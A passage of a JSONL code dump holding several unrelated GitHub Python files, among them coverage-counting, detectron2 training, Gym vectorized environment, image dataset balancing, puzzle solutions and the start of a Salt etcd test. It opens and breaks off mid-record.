len(temp) == 0:\n continue\n res[file_name] = temp\n\n if granularity == 'fun':\n all_cov_lines_dict = res\n res = dict()\n base_dir = '/workplace/software/pytorch3/torch/'\n method_line = get_all_method_line(base_dir)\n\n for file, line in method_line.items():\n if file not in all_cov_lines_dict.keys():\n continue\n for def_line in line:\n if def_line in all_cov_lines_dict[file]:\n if file not in res.keys():\n res[file] = []\n res[file].append(def_line)\n return res\n\n\ndef xml2dict(file):\n from xml.dom import minidom\n res = dict()\n dom = minidom.parse(file)\n data = dom.documentElement\n classes = data.getElementsByTagName('class')\n for clazz in classes:\n tmp = []\n class_name = clazz.getAttribute('filename')\n all_lines = clazz.getElementsByTagName('line')\n for line in all_lines:\n if line.getAttribute('branch').strip() != '' and line.getAttribute('hits').strip() == '1':\n line_num = line.getAttribute('number')\n # print(line_num)\n cov_state = line.getAttribute('condition-coverage')\n cov_state = cov_state.strip().split(' ')[1][1:-1]\n total_branch_this = int(cov_state.split('/')[1])\n cov_branch_this = int(cov_state.split('/')[0])\n missing_state = line.getAttribute('missing-branches').strip()\n missing_branch_list = missing_state.split(',')\n # 手动分析发现,对于部分覆盖,都是only缺少一个branch\n for i in range(cov_branch_this):\n if str(int(line_num)+1) in missing_branch_list:\n tmp.append(f'{line_num}_{i+1}')\n # print(missing_state)\n else:\n tmp.append(f'{line_num}_{i}')\n # print(missing_state)\n if len(tmp) != 0:\n # if class_name.startswith('/workplace/software/pytorch3/'):\n # class_name = '/workplace/software/mxnet2/' + class_name[len('/workplace/software/mxnet/'):]\n res[class_name] = tmp\n return res\n\n\ndef dict2set(dict, granularity='line'):\n res = set()\n if granularity == 'file':\n for k in dict.keys():\n res.add(k)\n else:\n for k, v in dict.items():\n for t in v:\n res.add(k+f'_{t}')\n return res\n\n\n# def calc_unique(dict_a, dict_b, granularity='line'):\n# diff_num = 0\n# # the unique of b related to a\n# if granularity == 'line':\n# for k, value in dict_b.items():\n# if k not in dict_a:\n# diff_num += len(value)\n# continue\n# for v_item in value:\n# if v_item not in dict_a[k]:\n# diff_num += 1\n#\n# elif granularity == 'file':\n# diff_file = set()\n# for k, value in dict_b.items():\n# if k not in dict_a:\n# diff_file.add(k) # unique file\n# continue\n# diff_num = len(diff_file)\n# return diff_num\n#\n#\n# def get_unique_cov_c(file_a, file_b, granularity='line'):\n# dict_a = file2dict(file_a)\n# dict_b = file2dict(file_b)\n# diff_num = calc_unique(dict_a, dict_b)\n# return diff_num\n#\n#\n# def get_unique_cov_python(file_a, file_b, granularity='line'):\n# dict_a = json2dict(file_a)\n# dic_b = json2dict(file_b)\n# diff_num = calc_unique(dict_a, dic_b)\n# return diff_num\n#\n#\n# def get_unique_coverage(pro_a, pro_b, granularity='line'):\n# pro_a_c = pro_a + 'c'\n# pro_a_python = pro_a + 'python/coverage.json'\n#\n# pro_b_c = pro_b + 'c'\n# pro_b_python = pro_b + 'python/coverage.json'\n#\n# if granularity == 'line':\n# file_name = 'stmt_info.txt'\n# else:\n# assert False, \"not support yet!\"\n#\n# diff_num_c = get_unique_cov_c(os.path.join(pro_a_c, file_name), os.path.join(pro_b_c, file_name))\n# diff_num_python = get_unique_cov_python(pro_a_python, pro_b_python)\n# diff_num = diff_num_c + diff_num_python\n# return diff_num\n\n\ndef get_all_set(pro, granularity=\"line\"):\n pro_c = pro + 'c'\n pro_python = pro + 'python/coverage.json'\n if granularity == 'line' or granularity == 'file':\n file_name = 'stmt_info.txt'\n elif granularity == 'fun':\n file_name = 'fun_info.txt'\n elif granularity == 'branch':\n file_name = 'branch_info.txt'\n pro_python = pro + 'python/coverage.xml'\n else:\n assert False, \"not support yet!\"\n pro_c = os.path.join(pro_c, file_name)\n dict_c = file2dict(pro_c)\n if granularity == 'branch':\n dict_python = xml2dict(pro_python)\n else:\n dict_python = json2dict(pro_python, granularity)\n # print(\"the total cov python file number is \", len(dict_python))\n import numpy as np\n print(\"the total cov line of python is \", np.sum([len(i) for i in dict_python.values()]))\n set_c = dict2set(dict_c, granularity)\n set_python = dict2set(dict_python, granularity)\n return set_c, set_python\n\n\nif __name__ == '__main__':\n # testsuite_cov = '../pytorch_cov/unit_cov/mxnet/res_cov_08_03/0/'\n cradle_cov = './audee_cov_pt_6models/0/'\n # lemon_cov = './CovByLemon/lemon_cov_pt_8models/99/'\n audee_cov = './audee_cov_pt_6models/99/'\n\n all_pro = [cradle_cov, audee_cov] # lemon_cov,\n\n # cradle_audee = get_unique_coverage(cradle_cov, audee_cov, granularity=\"line\")\n # cradle_lemon = get_unique_coverage(cradle_cov, lemon_cov, granularity=\"line\")\n # cradle_testsuite = get_unique_coverage(cradle_cov, testsuite_cov, granularity=\"line\")\n #\n # lemon_audee = get_unique_coverage(lemon_cov, audee_cov, granularity='line')\n # audee_lemon = get_unique_coverage(audee_cov, lemon_cov, granularity='line')\n #\n # print(cradle_lemon, cradle_audee, cradle_testsuite)\n # print(lemon_audee, audee_lemon)\n # granularity = 'fun'\n granularity = 'line'\n # granularity = 'branch'\n for pro in all_pro:\n pro_name = pro.split('/')[1].split('_')[0]\n if '/audee_cov_pt_6models/0/' in pro:\n pro_name = 'cradle'\n elif 'res_cov_08_03' in pro:\n pro_name = 'testsuite'\n print(pro_name)\n c, python = get_all_set(pro, granularity)\n with open(f'{granularity}_{pro_name}_set.txt', mode='w') as f:\n for i in c:\n f.write(i+'\\n')\n for j in python:\n # if j.startswith('/workplace/software/mxnet/'):\n # j = '/workplace/software/mxnet2/' + j[len('/workplace/software/mxnet/'):]\n f.write(j+'\\n')\n print(len(c) + len(python))\n","repo_name":"defects4dll/CollectPytorchCov","sub_path":"get_unique_cov.py","file_name":"get_unique_cov.py","file_ext":"py","file_size_in_byte":9041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72705864253","text":"import os\n\nfrom detectron2.checkpoint import DetectionCheckpointer\nfrom detectron2.config import get_cfg\nfrom detectron2.data import MetadataCatalog\nfrom detectron2.engine import DefaultTrainer\nfrom detectron2.engine import default_argument_parser, default_setup, launch\nfrom detectron2.evaluation import COCOEvaluator\nfrom detectron2.evaluation import verify_results\nfrom detectron2.model_zoo import get_config_file, get_checkpoint_url\nfrom detectron2.utils import comm as comm\nfrom loguru import logger\n\n\nclass Trainer(DefaultTrainer):\n @classmethod\n def build_evaluator(cls, cfg, dataset_name, output_folder=None):\n if output_folder is None:\n output_folder = os.path.join(cfg.OUTPUT_DIR, \"inference\")\n return COCOEvaluator(dataset_name, cfg, True, output_folder)\n\n\ndef setup(args):\n \"\"\"\n Create configs and perform basic setups.\n \"\"\"\n\n if args.dataset == \"vrd\":\n from xib.datasets.vrd import register_vrd\n\n register_vrd(args.data_root)\n elif args.dataset == \"hico\":\n from xib.datasets.hico_det import register_hico\n\n register_hico(args.data_root)\n else:\n raise ValueError(f\"Unknown dataset: {args.dataset}\")\n\n cfg = get_cfg()\n cfg.merge_from_file(\n get_config_file(\"COCO-Detection/faster_rcnn_X_101_32x8d_FPN_3x.yaml\")\n )\n\n cfg.MODEL.WEIGHTS = get_checkpoint_url(\n \"COCO-Detection/faster_rcnn_X_101_32x8d_FPN_3x.yaml\"\n )\n cfg.DATASETS.TRAIN = (f\"{args.dataset}_object_detection_train\",)\n cfg.DATASETS.TEST = (f\"{args.dataset}_object_detection_test\",)\n\n cfg.SOLVER.IMS_PER_BATCH = 1\n # cfg.MODEL.ROI_HEADS.BATCH_SIZE_PER_IMAGE = 128\n\n cfg.SOLVER.BASE_LR = 0.00025\n cfg.SOLVER.MAX_ITER = 300\n cfg.MODEL.ROI_HEADS.NUM_CLASSES = len(\n MetadataCatalog.get(f\"{args.dataset}_object_detection_train\").thing_classes\n )\n\n cfg.merge_from_list(args.opts)\n cfg.freeze()\n default_setup(cfg, args)\n return cfg\n\n\ndef main(args):\n cfg = setup(args)\n\n if args.eval_only:\n model = Trainer.build_model(cfg)\n DetectionCheckpointer(model, save_dir=cfg.OUTPUT_DIR).resume_or_load(\n cfg.MODEL.WEIGHTS, resume=args.resume\n )\n res = Trainer.test(cfg, model)\n if comm.is_main_process():\n verify_results(cfg, res)\n return res\n\n trainer = Trainer(cfg)\n trainer.resume_or_load(resume=args.resume)\n return trainer.train()\n\n\n\"\"\"\n# Example:\npython -m xib.preprocessing.train_detectron \\\n --dataset=vrd \\\n --data-root=data/raw/vrd \\\n --eval-only\n\"\"\"\nif __name__ == \"__main__\":\n parser = default_argument_parser()\n parser.add_argument(\n \"--dataset\",\n required=True,\n help=\"Which dataset to use.\",\n choices=[\"hico\", \"vrd\"],\n )\n parser.add_argument(\n \"--data-root\", required=True, help=\"Where the raw dataset is stored.\"\n )\n args = parser.parse_args()\n\n if args.config_file != \"\":\n logger.warning(f\"Config file will be ignored: {args.config_file}\")\n del args.config_file\n\n print(\"Command Line Args:\", args)\n launch(\n main,\n args.num_gpus,\n num_machines=args.num_machines,\n machine_rank=args.machine_rank,\n dist_url=args.dist_url,\n args=(args,),\n )\n","repo_name":"baldassarreFe/ws-vrd","sub_path":"src/xib/preprocessing/train_detectron.py","file_name":"train_detectron.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"78"} +{"seq_id":"13722493669","text":"#!/usr/bin/env python\n# Vectorized environment implementation based on OpenAI Gym| Praveen Palanisamy\n# Chapter 8, Hands-on Intelligent Agents with OpenAI Gym, 2018\n\nimport multiprocessing as mp\nimport gym\nfrom abc import ABC, abstractmethod\nimport numpy as np\nimport cv2\n\nclass VecEnv(ABC):\n \"\"\"\n An abstract asynchronous, vectorized environment.\n \"\"\"\n def __init__(self, num_envs, observation_space, action_space):\n self.num_envs = num_envs\n self.observation_space = observation_space\n self.action_space = action_space\n\n @abstractmethod\n def reset(self):\n \"\"\"\n Reset all the environments and return an array of\n observations, or a tuple of observation arrays.\n\n If step_async is still doing work, that work will\n be cancelled and step_wait() should not be called\n until step_async() is invoked again.\n \"\"\"\n pass\n\n @abstractmethod\n def step_async(self, actions):\n \"\"\"\n Tell all the environments to start taking a step\n with the given actions.\n Call step_wait() to get the results of the step.\n\n You should not call this if a step_async run is\n already pending.\n \"\"\"\n pass\n\n @abstractmethod\n def step_wait(self):\n \"\"\"\n Wait for the step taken with step_async().\n\n Returns (obs, rews, dones, infos):\n - obs: an array of observations, or a tuple of\n arrays of observations.\n - rews: an array of rewards\n - dones: an array of \"episode done\" booleans\n - infos: a sequence of info objects\n \"\"\"\n pass\n\n @abstractmethod\n def close(self):\n \"\"\"\n Clean up the environments' resources.\n \"\"\"\n pass\n\n def step(self, actions):\n self.step_async(actions)\n return self.step_wait()\n\n def render(self):\n print('WARNING:Render not defined for %s'%self)\n\n @property\n def unwrapped(self):\n return self\n\n\nclass ResizeFrame(gym.ObservationWrapper):\n def __init__(self,env):\n gym.ObservationWrapper.__init__(self, env)\n self.desired_width = 84 # Change this as necessary. 84 is not a magic number.\n self.desired_height = 84\n def observation(self, obs):\n if len(obs.shape) == 3: # Observations are image frames\n obs = cv2.resize(obs, (self.desired_width, self.desired_height))\n return obs\n\ndef run_env_in_sep_proc(env_name, shared_pipe, parent_pipe, stack=False, scale_rew=False):\n \"\"\"\n Create and run an environment instance (remote or local) in a separate proc\n \"\"\"\n parent_pipe.close()\n\n env = gym.make(env_name)\n # Apply env pre-processing here if needed\n #if scale_rew:\n # env = RewardScaler(env)\n #env = CustomWarpFrame(env)\n #env = NormalizedEnv(env)\n env = ResizeFrame(env)\n\n while True:\n method, data = shared_pipe.recv()\n if method == 'step':\n next_obs, rew, done, info = env.step(data)\n if done:\n next_obs = env.reset()\n shared_pipe.send((next_obs, rew, done, info))\n\n if method == 'reset':\n obs = env.reset()\n shared_pipe.send(obs)\n\n if method == 'get_spaces':\n shared_pipe.send((env.observation_space, env.action_space))\n\nclass SubprocVecEnv(VecEnv):\n def __init__(self, env_names, spaces=None):\n \"\"\"\n env_names: list of (gym) environments to run in sub/separate processes\n \"\"\"\n self.waiting = False\n self.closed = False\n num_envs = len(env_names)\n self.remotes, self.work_remotes = zip(*[mp.Pipe() for _ in range(num_envs)])\n self.ps = []\n for (env_name, worker_conn, parent_conn) in zip(env_names, self.work_remotes, self.remotes):\n self.ps.append(mp.Process(target=run_env_in_sep_proc, args=(env_name, worker_conn, parent_conn)))\n for p in self.ps:\n p.daemon = True # if the main process crashes, we should not cause things to hang\n p.start()\n\n for remote in self.work_remotes:\n remote.close()\n\n self.remotes[0].send(('get_spaces', None))\n observation_space, action_space = self.remotes[0].recv()\n VecEnv.__init__(self, num_envs, observation_space, action_space)\n\n def step_async(self, actions):\n for remote, action in zip(self.remotes, actions):\n remote.send(('step', action))\n self.waiting = True\n\n def step_wait(self):\n results = [remote.recv() for remote in self.remotes]\n self.waiting = False\n obs, rews, dones, infos = zip(*results)\n return np.stack(obs), np.stack(rews), np.stack(dones), infos\n\n def reset(self):\n for remote in self.remotes:\n remote.send(('reset', None))\n return np.stack([remote.recv() for remote in self.remotes])\n\n def close(self):\n if self.closed:\n return\n if self.waiting:\n for remote in self.remotes:\n remote.recv()\n for remote in self.remotes:\n remote.send(('close', None))\n for p in self.ps:\n p.join()\n self.closed = True\n\n\nclass EnvProc(mp.Process):\n def __init__(self, env_name, requests):\n super(EnvProc, self).__init__()\n self.env_name = env_name\n self.requests= requests\n self.terminate = False\n\n def run(self):\n self.env = gym.make(self.env_name)\n while not self.terminate:\n #while not self.request_queue.empty() or self.request_queue.qsize():\n request = self.requests.recv()\n result = self.call_env(request[\"method\"], request[\"data\"])\n self.requests.send(result)\n\n def call_env(self, method, data):\n if method == \"step\":\n next_obs, reward, done, info = self.env.step(data)\n return (next_obs, reward, done, info)\n elif method == \"reset\":\n obs = self.env.reset()\n return obs\n elif method == \"render\":\n self.env.render()\n elif method == \"observation_space\":\n return self.env.observation_space\n elif method == \"action_space\":\n return self.env.action_space\n elif method == \"close\":\n self.env.close()\n self.terminate = True\n\n\nclass EnvProxy(object):\n def __init__(self, env_name):\n self.pipe, self.child_pipe = mp.Pipe()\n self.env_proc = EnvProc(env_name, self.child_pipe)\n self.env_proc.start()\n def step(self, action):\n self.pipe.send({\"method\": \"step\", \"data\": action})\n return self.pipe.recv()\n def reset(self):\n self.pipe.send({\"method\": \"reset\", \"data\": None})\n return self.pipe.recv()\n def render(self):\n self.pipe.send({\"method\": \"render\", \"data\": None})\n @property\n def observation_space(self):\n self.pipe.send({\"method\": \"observation_space\", \"data\": None})\n return self.pipe.recv()\n @property\n def action_space(self):\n self.pipe.send({\"method\": \"action_space\", \"data\": None})\n return self.pipe.recv()\n def close(self):\n self.pipe.send({\"method\": \"close\", \"data\": None})\n self.env_proc.join()\n\n\ndef make_env(env_name):\n env_proxy= EnvProxy(env_name)\n return env_proxy\n","repo_name":"PacktPublishing/Hands-On-Intelligent-Agents-with-OpenAI-Gym","sub_path":"ch8/environment/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7317,"program_lang":"python","lang":"en","doc_type":"code","stars":322,"dataset":"github-code","pt":"78"} +{"seq_id":"3130468024","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 13 10:21:25 2019\n\n@author: 10809305\n\"\"\"\nimport os\nimport shutil\nimport random\nimport pandas as pd\n\nfrom fileIO import csv_path_list\n\ndef collect_roi(path):\n \n csv_list = csv_path_list(path)\n df_all = None\n for idx in range(len(csv_list)):\n print(csv_list[idx])\n df_csv = pd.read_csv(csv_list[idx], header=0, index_col=None)\n df_filter = df_csv[['kb_model', 'location' , 'description']]\n df_all = pd.concat([df_all, df_filter], axis = 0)\n \n# df_all.to_csv(os.path.join(os.path.dirname(), 'all.csv'), header = True, index = False)\n return df_all\n\n\ndef df_img(image_dir, df_csv):\n img_record, error_record = [], []\n columns = ['img_path', 'kb_model', 'label','location', 'description']\n i = 0\n for root, dirs, files in os.walk(image_dir):\n\n for file in files:\n if not file.endswith('.jpg'): continue\n _img_kb = os.path.basename(os.path.dirname(root))\n _label = os.path.basename(root)\n if '@' in file: _loc = file.split('@')[1].split('_')[0]\n else: _loc = file.split('_')[2]\n filter_kb_loc = (df_csv['kb_model'] == _img_kb) & (df_csv['location'] == _loc)\n _img_desc = df_csv[filter_kb_loc]['description'].values.tolist()\n\n if len(_img_desc) == 1:\n i += 1\n _img_desc = _img_desc[0]\n print('\\rNum: %s , img: %s' % (i, file), end='')\n img_record.append([os.path.join(root, file), _img_kb, _label, _loc, _img_desc])\n else:\n error_record.append([file, _img_kb, _label, _loc, len(_img_desc)])\n\n \n print('')\n df_error = pd.DataFrame(error_record, columns=columns)\n df_error.to_csv(os.path.join(image_dir, 'ROIerror_record.csv'), header = True, index = False)\n df_img_record = pd.DataFrame(img_record, columns=columns)\n\n return df_img_record\n\ndef count_list(column_str, df): # count each column \n count_record = []\n columns = [column_str, 'count']\n all_count = df[column_str].values.tolist()\n all_count_set = set(all_count) \n for item in all_count_set:\n count_record.append([item, all_count.count(item)]) \n df_count = pd.DataFrame(count_record, columns=columns)\n \n return df_count\n\ndef count_list_by_label(key, column_str, df): # count description by key\n all_key = df[key].values.tolist()\n all_key_set = set(all_key)\n df_key_list, df_str_key = [], []\n \n for item in all_key_set:\n _df = []\n filter_key = (df[key] == item)\n item_count = df[filter_key][column_str].values.tolist()\n item_count_set = set(item_count)\n for item1 in item_count_set:\n _df.append([item1, item_count.count(item1)])\n df_key_list.append(_df)\n df_str_key.append(item)\n \n return df_str_key, df_key_list\n\ndef get_ramdom_img(img_filter_index, each_key_num, df, save_image_dir, image_times):\n random_img_index = random.sample(img_filter_index, each_key_num)\n# print('random_idx: ' + str(random_img_index))\n for ran_idx in range(len(random_img_index)):\n _kb_model = df.iloc[random_img_index[ran_idx]]['kb_model']\n _image_path = df.iloc[random_img_index[ran_idx]]['img_path']\n _image_name = os.path.basename(_image_path)\n _image_label = df.iloc[random_img_index[ran_idx]]['label']\n _save_image_dir = os.path.join(save_image_dir, _kb_model, _image_label)\n \n if image_times:\n _image_name = '%s_%s.jpg' % (os.path.splitext(_image_name)[0], image_times)\n _save_image_file = os.path.join(_save_image_dir, _image_name)\n else:\n _save_image_file = _save_image_dir\n \n \n if not os.path.exists(_save_image_dir):\n os.makedirs(_save_image_dir)\n if not os.path.exists(os.path.join(_save_image_dir, _image_name)):\n shutil.copy(_image_path, _save_image_file)\n\ndef get_times_img(img_filter_index, df, save_image_dir, image_times):\n for filter_idx in range(len(img_filter_index)):\n _kb_model = df.iloc[img_filter_index[filter_idx]]['kb_model']\n _image_path = df.iloc[img_filter_index[filter_idx]]['img_path']\n _image_name = os.path.basename(_image_path)\n _image_label = df.iloc[img_filter_index[filter_idx]]['label']\n _save_image_dir = os.path.join(save_image_dir, _kb_model, _image_label)\n\n for times_idx in range(image_times):\n _image_times_name = '%s_%s.jpg' % (os.path.splitext(_image_name)[0], times_idx)\n if not os.path.exists(_save_image_dir):\n os.makedirs(_save_image_dir)\n if not os.path.exists(os.path.join(_save_image_dir, _image_times_name)):\n shutil.copy(_image_path, os.path.join(_save_image_dir, _image_times_name))\n\ndef get_balance_img(key, column_str, key_list_idx, df, save_image_dir):\n error_record = []\n columns = [column_str, 'count']\n key_num = len(key_list_idx)\n df_key = pd.DataFrame(key_list_idx, columns=columns)\n# key_image_num = int(df_key['count'].sum())\n if key == 'OK':\n each_key_num = int(df_key['count'].median())\n else:\n each_key_num = int(df_key['count'].mean())\n #each_key_num = 50\n\n print('each_key_num: ' + str(each_key_num) + '; desc_num: ' + str(len(key_list_idx)))\n\n for key_idx in range(key_num):\n filter_key = ((df[column_str] == df_key[column_str][key_idx]) \n & (df['label'] == key))\n img_filter = df[filter_key]\n img_filter_index = img_filter.index.values.tolist()\n\n if len(img_filter) >= each_key_num:\n if key == 'OK' :\n get_ramdom_img(img_filter_index, each_key_num, df, save_image_dir, 0)\n else:\n get_ramdom_img(img_filter_index, len(img_filter), df, save_image_dir, 0)\n \n print(key_idx, '/', key_num,'count: ' + str(len(img_filter_index)))\n \n else:\n try:\n _image_times = int(each_key_num / len(img_filter_index))\n _image_remainder = int(each_key_num % len(img_filter_index))\n except:\n _image_times = 0\n _image_remainder = 0\n print('No img, label: ', key, ' desc:', df_key[column_str][key_idx])\n error_record.append([key, df_key[column_str][key_idx]]) \n \n print(key_idx, '/', key_num,'count: ' + str(len(img_filter_index)) + ' times: ' + str(_image_times) + ' remainder: ' + str(_image_remainder))\n get_times_img(img_filter_index, df, save_image_dir, _image_times) \n if _image_remainder :\n get_ramdom_img(img_filter_index, _image_remainder, df, save_image_dir, _image_times)\n else: pass\n fp_w = open(os.path.join(save_image_dir, 'balance_result.txt'), 'a+')\n fp_w.write(str(key) +' each_key_num: ' + str(each_key_num) + '; desc_num: ' + str(len(key_list_idx)) + '\\n')\n fp_w.close()\n df_error = pd.DataFrame(error_record, columns = ['label', 'discription'])\n df_error.to_csv(os.path.join(save_image_dir, 'img_error_record.csv'), header = True, index = False)\n df_key.to_csv( os.path.join(save_image_dir, '%s_count.csv' % key), header = True, index = False)\n \n \n\ndef balance_by_desciption(image_dir, save_image_dir, csv_path):\n\n\n \n df_csv = collect_roi(csv_path)\n# print(len(df_csv))\n df_img_record = df_img(image_dir, df_csv) \n df_desc_label, df_label_list = count_list_by_label('label', 'description', df_img_record)\n for i in range(len(df_desc_label)):\n print('label: ', df_desc_label[i], 'desc: ', len(df_label_list[i]))\n \n \n# =============================================================================\n# \n# #-----all image parameter\n# df_desc_count = count_list('description', df_img_record)\n# \n# tatol_image_num = len(df_img_record)\n# total_location_num = len(df_desc_count)\n# print(tatol_image_num)\n# print(total_location_num)\n# =============================================================================\n \n for idx in range(len(df_label_list)):\n if df_desc_label[idx] == 'OK':\n print(df_desc_label[idx])\n get_balance_img('OK', 'description', df_label_list[idx], df_img_record, save_image_dir)\n elif df_desc_label[idx] == 'NG':\n print(df_desc_label[idx])\n get_balance_img('NG', 'description', df_label_list[idx], df_img_record, save_image_dir)\n elif df_desc_label[idx] == 'UNCONFIRMED':\n print(df_desc_label[idx])\n get_balance_img('UNCONFIRMED', 'description', df_label_list[idx], df_img_record, save_image_dir)\n elif df_desc_label[idx] == 'MISS':\n print(df_desc_label[idx])\n get_balance_img('MISS', 'description', df_label_list[idx], df_img_record, save_image_dir)\n elif df_desc_label[idx] == 'POOR':\n print(df_desc_label[idx])\n get_balance_img('POOR', 'description', df_label_list[idx], df_img_record, save_image_dir)\n elif df_desc_label[idx] == 'SHIFT':\n print(df_desc_label[idx])\n get_balance_img('SHIFT', 'description', df_label_list[idx], df_img_record, save_image_dir)\n elif df_desc_label[idx] == 'WRONG':\n print(df_desc_label[idx])\n get_balance_img('WRONG', 'description', df_label_list[idx], df_img_record, save_image_dir)\n elif df_desc_label[idx] == 'SHORT':\n print(df_desc_label[idx])\n get_balance_img('SHORT', 'description', df_label_list[idx], df_img_record, save_image_dir)\n elif df_desc_label[idx] == 'SHIFT1':\n print(df_desc_label[idx])\n get_balance_img('SHIFT1', 'description', df_label_list[idx], df_img_record, save_image_dir)\n elif df_desc_label[idx] == 'SHIFT2':\n print(df_desc_label[idx])\n get_balance_img('SHIFT2', 'description', df_label_list[idx], df_img_record, save_image_dir)\n elif df_desc_label[idx] == 'EMPTY':\n print(df_desc_label[idx])\n get_balance_img('EMPTY', 'description', df_label_list[idx], df_img_record, save_image_dir)\n else:\n print('other label: ' + str(df_desc_label[idx]))\n \n df_img_record.to_csv( os.path.join(save_image_dir, 'img_count.csv'), header = True, index = False)\n\n\nif __name__ == '__main__': \n image_dir = r'/media/swpcserver/DISK2/Hazel/MultiClass/P1_MergeP3poor/datasets2'\n save_image_dir = r'/media/swpcserver/DISK2/Hazel/MultiClass/P1_MergeP3poor/balance'\n csv_path = r'/media/swpcserver/DISK2/Hazel/MultiClass/P1_MergeP3poor/ROI' \n balance_by_desciption(image_dir, save_image_dir, csv_path)\n\n","repo_name":"huiling-weng/git_test","sub_path":"balance/balance_Img.py","file_name":"balance_Img.py","file_ext":"py","file_size_in_byte":10808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"23490332834","text":"# https://www.codewars.com/kata/515de9ae9dcfc28eb6000001\n# Complete the solution so that it splits the string into pairs of two characters. \n# If the string contains an odd number of characters then it should replace the \n# missing second character of the final pair with an underscore ('_').\n\ndef solution(s):\n l = len(s)\n if l % 2 == 1:\n s += '_'\n l += 1\n arr = []\n for x in range(0,l-1, 2):\n arr.append(s[x:x+2])\n return arr\n","repo_name":"aritrakar/codewars","sub_path":"5,6 kyu/SplitStrings.py","file_name":"SplitStrings.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"23491153285","text":"# cook your dish here\nfor t in range(int(input())):\n \n ts = int(input())\n temp = ts\n cnt = 0\n \n while(ts % 2 == 0):\n ts /= 2\n cnt += 1\n \n js = int((temp) // (2**(cnt+1)))\n \n print(js)\n \n\n\n# from math import ceil, floor, pow\n\n# T = float(input())\n \n# while (T > 0) :\n \n# ts = float(input())\n# temp = float(ts)\n \n# cnt = 1\n \n# if ts % 2 == 1:\n# print(int(ts//2))\n# T -= 1\n# continue\n \n# while ts % int(pow(2, cnt)) == 0:\n# cnt += 1\n \n# print(int(temp // pow(2, cnt)))\n \n# T = T - 1\n \n# # print(T)","repo_name":"Rajeevveera24/coding","sub_path":"competitive_programming/codechef/long_challenge/2020/June_2020/EOEO.py","file_name":"EOEO.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31297974510","text":"width=50\nheight=50\nepoch=10000\nbatch=256\ntrain_dir='train'\ntest_dir='dark'\npretrained_path='pretrained/model.ckpt-2'\nmodel_ckpt = 'weightfile/model.ckpt'\ncharset='0123456789ABCDEFGHJKLMNPQRSTUVWXYZ'\nnum_class=len(charset)\n","repo_name":"wushilian/CNN_OCR","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"19276385963","text":"\ndef get_features(line):\n\tvowelPairs, conPairs = vowelConsPairs(line)\n\n\twords = set(line.split())\n\n\tfeatures = {\n\t\t\t\t\"cvRatio\":\t\tvowelConsRatio(line),\n\t\t\t\t\"averageLen\":\tavgWordLen(line),\n\t\t\t\t\"vowelPairs\":\tvowelPairs,\n\t\t\t\t\"conPairs\"\t:\tconPairs,\n\t\t\t\t\"letterPairs\":\tletterPairs(line),\n\t\t\t\t\"endsInEN\"\t:\tendsIn(\"en\",line),\n\t\t\t\t\"containsHET\":\t0 if \"het\" in words else 1,\n\t\t\t\t\"containsDE\":\t0 if \"de\" in words else 1,\n\t\t\t\t\"containsOF\":\t1 if \"of\" in line else 0,\n\t\t\t\t\"containsTHE\":\t1 if \"the\" in line else 0,\n\t\t\t\t\"containsAND\":\t1 if \"and\" in line else 0,\n\t\t\t}\n\treturn features\n\n\ndef vowelConsPairs(line):\n\n\tvowels = (\"a\",\"e\",\"i\",\"o\",\"u\")\n\tvCount = cCount = 0\n\tindex = 0\n\t\t\n\twhile index < len(line)-1:\n\t\tchar = line[index]\n\t\tnextChar = line[index+1]\n\n\t\tif char in vowels and char == nextChar:\n\t\t\tvCount += 1\n\t\t\tindex += 2\n\t\telif char == nextChar:\n\t\t\tcCount += 1\n\t\t\tindex += 2\n\t\telse:\n\t\t\tindex += 1\n\tif vCount > 2:\n\t\tV = 0\n\telse:\n\t\tV = 1\n\tif cCount > 2:\n\t\tC = 1\n\telse:\n\t\tC = 0\n\treturn V,C\n\n\n\ndef vowelConsRatio(line):\n\tvowels = (\"a\",\"e\",\"i\",\"o\",\"u\")\n\tvCount = cCount = 0\n\n\tfor char in line:\n\t\tif char in vowels:\n\t\t\tvCount += 1\n\t\telse:\n\t\t\tcCount += 1\n\n\tratio = vCount/cCount\n\tratio *= 100\t\n\tif int(ratio) > 40:\n\t\treturn 0\n\telse:\n\t\treturn 1\n\n\ndef avgWordLen(line):\n\n\ttotalCount = 0\n\n\tfor words in line:\n\t\tif words.isdigit():\n\t\t\tpass\n\t\telse:\n\t\t\ttotalCount += 1\n\n\tavg = totalCount // len(line.split())\n\n\tif avg > 3:\n\t\treturn 0\n\telse:\n\t\treturn 1\n\n\ndef endsIn(string,line):\n\tline = line.split()\n\tfor word in line:\n\t\tif len(word) < len(string):\n\t\t\tcontinue\n\n\t\tdiff = len(word) - len(string)\n\t\tflag = 1\n\n\t\tfor char in string:\n\t\t\tif word[diff] != char:\n\t\t\t\tflag = 0\n\t\t\t\tbreak\n\t\t\tdiff += 1\n\t\tif flag:\n\t\t\treturn flag\n\n\treturn 0\n\n\ndef letterPairs(line):\n\t\n\tcount = 0\n\tfor i in range(len(line)-1):\n\t\tchar = line[i]\n\t\tnextChar = line[i+1]\n\n\t\tif char == nextChar:\n\t\t\tcount += 1\n\tif count > 3:\n\t\treturn 0\n\telse:\n\t\treturn 1\n","repo_name":"sharjeel6392/Classification-of-language","sub_path":"dataParsing.py","file_name":"dataParsing.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12851910134","text":"import logging\n\nimport pytest\n\nimport salt.returners.etcd_return as etcd_return\nimport salt.utils.json\nfrom salt.utils.etcd_util import get_conn\nfrom tests.support.pytest.etcd import * # pylint: disable=wildcard-import,unused-wildcard-import\n\ndocker = pytest.importorskip(\"docker\")\n\nlog = logging.getLogger(__name__)\n\npytestmark = [\n pytest.mark.skip_if_binaries_missing(\"docker\", 